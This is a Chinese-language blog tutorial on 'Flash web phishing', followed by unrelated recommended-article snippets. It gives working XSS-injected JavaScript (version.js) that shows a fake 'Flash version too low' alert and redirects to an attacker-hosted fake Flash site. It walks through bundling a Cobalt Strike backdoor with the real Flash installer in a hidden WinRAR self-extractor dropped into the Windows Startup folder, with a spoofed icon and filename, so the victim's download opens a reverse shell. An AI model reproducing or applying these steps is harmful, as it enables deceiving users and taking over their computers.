钓鱼攻击之:Flash 网页钓鱼

1 准备资料

  1. Flash网站克隆源码:GitHub - hackxc/xss_flash: Xss之Flash钓鱼
  2. 生成后门并捆绑flash的安装程序
  3. VPS服务器,并使用步骤1的资源,搭建好flash网站,下载地址要修改为构造好的后门文件。
  4. 有XSS漏洞的网站:GitHub - r00tSe7en/Flash-Pop: Flash钓鱼弹窗优化版

2 具体钓鱼流程

  1. 找到可以插入一段JS代码的网站,如:存在存储xss漏洞。插入触发flash版本过低弹窗的JS代码:

    <script src='http://192.168.10.3/version.js'></script>
  2. 目标点击确定后,跳转到伪造flash界面的VPS服务器,

  3. 目标靶机点击下载并安装,触发后门反弹shell

3 生成后门并捆绑flash的安装程序

  1. 通过CS生成C格式的shellcode,利用下面的网站生成后门程序

  2. 安装Winrar。

  3. 同时选中后门与Flash官方安装包,右键选择:添加到压缩文件。

  4. 选择:创建自解压格式压缩文件-->修改:压缩文件名(使其看起来更可信)

  5. 选择:高级-->自解压选项-->更新-->更新模式:解压并更新文件-->覆盖模式:覆盖所有文件

  6. 高级自解压选项窗口中选择:常规-->解压路径放到windows开机自启动目录

    C:\ProgramData\Microsoft\Windows\StartMenu\Programs\Startup

  7. 高级自解压选项窗口中选择:设置-->解压后运行:r9VTngXsPg.exe-->解压前运行:flashplayerpp_install_cn.exe

  8. 高级自解压选项窗口中选择:模式-->全部隐藏

  9. 生成文件

  10. 为了增加可信度,修改生成后的文件图标

    1. 使用 ResourceHacker 导出flash官方文件的图标组

    2. 再用 ResourceHacker 将生成的自解压文件图标组修改成刚刚导出的flash图标组

    3. 另存为exe文件,再次确保命名为官网相同文件名

  11. 上传到VPS服务器中

4 处理WEB站点过程

  1. 模拟伪造Flash网站的VPS服务器:kali下

    1. 将下载的xss_flash目录中的文件全部移到/var/www/html

    2. 修改下载软件的地址为前面构造的后门软件

    3. 修改version.js中弹窗的指向伪造Flash网站地址

      window.alert = function(name){
      var iframe = document. createElement("IFRAME");
      iframe.style.display="none";
      iframe.setAttribute("src",'data:text/plain,');
      document. documentElement.appendChild(iframe);
      window.frames [0].window.alert(name);
      iframe.parentNode.removeChild(iframe);
      }
      alert( "您的FLASH版本过低,尝试升级后访问该页面! ");
      window. location.href="http://192.168.10.3";
      • 此处伪造Flash网站地址为:http://192.168.10.3
    4. 启动apache2服务

  2. 模拟存在XSS网站的VPS服务器:index.html

    <!DOCTYPE html>
    <html>
    <head>
    <meta charset="utf-8">
    <title>Flash Test...</title>
    <script src='http://192.168.10.3/version.js'></script>
    </head>
    <body>
    <h1>Flash Test...</h1>
    </body>
    </html>
    • 模拟插入了<script src='http://192.168.10.3/version.js'></script>脚本
    • 此处存在XSS网站的VPS服务器地址为:http://192.168.10.3:81
  3. 目标靶机访问到这个存在XSS的页面就会执行代码

  4. 点确定后,跳转到伪造Flash网站

  5. 目标靶机点击下载并运行exe后,成功上线

钓鱼攻击之:Flash 网页钓鱼的更多相关文章

  1. DNS欺骗:网站克隆实现网站钓鱼攻击

    1 DNS 1.1 DNS是什么? 域名系统(Domain Name System)是互联网使用的命名系统,用来将主机域名转换为 ip 地址,属于应用层协议,使用 UDP 传输. 1.2 为什么需要D ...

  2. 支付SDK的安全问题——隐式意图可导致钓鱼攻击

     该漏洞涉及到app所使用的intent和intent filter. intent是一个可用于从一个app组件请求动作或处理事件的“消息对象”.Intent负责对应用中一次操作的动作.动作涉及数据. ...

  3. pikachu练习平台(XSS-漏洞测试案例(cookie的窃取和利用、钓鱼攻击、XSS获取键盘记录))

    XSS-漏洞测试案例 xss案例 1.cookie的窃取和利用 2.钓鱼攻击 3.XSS获取键盘记录 在进行案例之前首先要搭建xss后台 搭建xss后台 1.在pikachu文件夹下面,把pkxss单 ...

  4. CobaltStrike 生成office宏病毒进行钓鱼攻击

    关于WORD宏: 在百度百科上有: 宏是一个批量处理程序命令,正确地运用它可以提高工作效率.微软的office软件允许用户自己编写,叫VBA的脚本来增加其灵活性,进一步扩充它的能力.如完打开word文 ...

  5. 风炫安全WEB安全学习第二十四节课 利用XSS钓鱼攻击

    风炫安全WEB安全学习第二十四节课 利用XSS钓鱼攻击 XSS钓鱼攻击 HTTP Basic Authentication认证 大家在登录网站的时候,大部分时候是通过一个表单提交登录信息. 但是有时候 ...

  6. 钓鱼攻击之远程加载恶意Word模版文件上线CS

    0x00 前言 利用Word文档加载附加模板时的缺陷所发起的恶意请求而达到的攻击目的,所以当目标用户点开攻击者发给他的恶意word文档就可以通过向远程服务器请求恶意模板并执行恶意模板上的恶意代码.这里 ...

  7. kali下利用weeman进行网页钓鱼

    工具下载链接:https://files.cnblogs.com/files/wh4am1/weeman-master.zip 利用wget命令下载zip压缩包 利用unzip命令解压 接着直接cd进 ...

  8. 推荐美丽的flash网页MP3音乐播放器

    文章来源:PHP开发学习门户 地址:http://www.phpthinking.com/archives/491 在网页制作中.假设想在网页中插入mp3音乐来增添网页的互动感,提升用户体验度,这个时 ...

  9. Selenium+Java - 结合sikuliX操作Flash网页

    前言 前天被一个Flash的轮播图,给玩坏了,无法操作,后来请教了下crazy总拿到思路,今天实践了下,果然可以了,非常感谢! 模拟场景 打开百度地图 切换城市到北京 使用测距工具 测量 奥林匹克森林 ...

  10. 使用Wifi pineapple(菠萝派)进行Wi-Fi钓鱼攻击

    简介: WiFi Pineapple 是由国外无线安全审计公司Hak5开发并售卖的一款无线安全测试神器. 特性: 用作 Wi-Fi 中间人攻击测试平台 一整套的针对 AP 的渗透测试套件 基于 WEB ...

随机推荐

  1. linux开机进入grub rescue界面修复

    一.先输入ls回车,查看显示内容 如: (hd0) (hd0,msdos1) (hd0,msdos2)... 二.然后找出哪个盘安装了系统 ls (hd0,msdos1)/boot/grub/ ls( ...

  2. 架构解析:Dubbo3 应用级服务发现如何应对双11百万集群实例

    继业务全面上云后,今年双11,阿里微服务技术栈全面迁移到以 Dubbo3 为代表的云上开源标准中间件体系.在业务上,基于 Dubbo3 首次实现了关键业务不停推.不降级的全面用户体验提升,从技术上,大 ...

  3. 【Spark】Day04-Spark Streaming:与离线批量比较、架构特点、入门案例、创建(队列、数据源)、转换(有状态、无状态)、输出方式、进阶(累加、转换为DF、缓存持久化)、实战(窗口统计)

    一.概述 1.离线和实时计算 离线:数据量大,数据不会变化,MapReduce 实时:数据量小,计算过程要短 2.批量和流式处理 批量:冷数据,数据量大,速度慢 流:在线.实时产生的数据(快速持续到达 ...

  4. 大规模爬取(新浪为例子)网页之downloader、parser的封装(涉及编码等细节)

    import requests import cchardet import traceback from lxml import etree def downloader(url,timeout = ...

  5. 深入浅出OSI七层参考

    本篇博客是笔者阅读<图解TCP/IP>所记录下的笔记,有兴趣的朋友可以去看一看这本书. OSI七层参考模型 ​ 本小节以电子邮件通信为例,分别来阐述OSI七层模型的每一层是如果进行通信处理 ...

  6. k8s本地联调工具kt-connect

    1.Kt Connect简介 KT Connect ( Kubernetes Developer Tool ) 是轻量级的面向 Kubernetes 用户的开发测试环境治理辅助工具.其核心是通过建立本 ...

  7. P8340 [AHOI2022] 山河重整

    \(20pts\) 给 \(O(2^n)\) 枚举,\(60pts\) 是 \(O(n^2)\),先看看怎么做.计数题无非容斥和 \(dp\),不妨从 \(dp\) 入手.多项式复杂度的做法意味着无法 ...

  8. HBase详解(03) - HBase架构和数据读写流程

    RegionServer 架构 每个RegionServer可以服务于多个Region 每个RegionServer中有多个Store, 1个WAL和1个BlockCache 每个Store对应一个列 ...

  9. Profiler导致的严重性能问题

    背景 客户反馈系统突然运行非常缓慢,持续了近20分钟的时间,通过SQL专家云定位到有人开启了Profiler导致,但是不能定位是谁开启的,请我们协助分析. 现象  登录SQL专家云,进入实时可视化页面 ...

  10. CVE-2020-1957

    漏洞名称 Apache Shiro 认证绕过漏洞 CVE-2020-1957 利用条件 Apache Shiro < 1.5.1 漏洞原理 Apache Shiro 是一款开源安全框架,提供身份 ...